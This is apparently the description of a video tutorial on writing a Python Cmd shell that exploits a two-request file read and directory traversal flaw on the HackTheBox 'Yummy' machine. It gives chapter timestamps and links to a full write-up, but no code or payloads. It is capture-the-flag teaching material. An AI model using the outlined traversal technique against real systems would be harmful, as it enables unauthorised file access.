In Yummy from HackTheBox, I've got a file read vulnerability that takes two requests to trigger, as well as a bit of setup with the website. I'll write a shell that takes a filename, returns the contents of the file (or the reason it can't), and then reprompts using the Python Cmd package and requests. To get requests to do the directory traversal correctly, I'll use the prepare mechanism.
Full Yummy Solution: https://0xdf.gitlab.io/2025/02/22/htb-yummy.html
☕ Buy Me A Coffee: https://www.buymeacoffee.com/0xdf
[00:00] Introduction
[01:00] Vulnerability demo
[04:18] Intial CMD shell
[07:25] __init__
[08:26] login function
[10:20] Get valid booking ID
[16:20] Default command
[19:38] Preparing request for traversal
[24:09] Update to handle any file
[24:55] Checks for access denied and file not found
[27:01] Adding file download
[31:45] Conclusion
#HackTheBox #ctf #xss
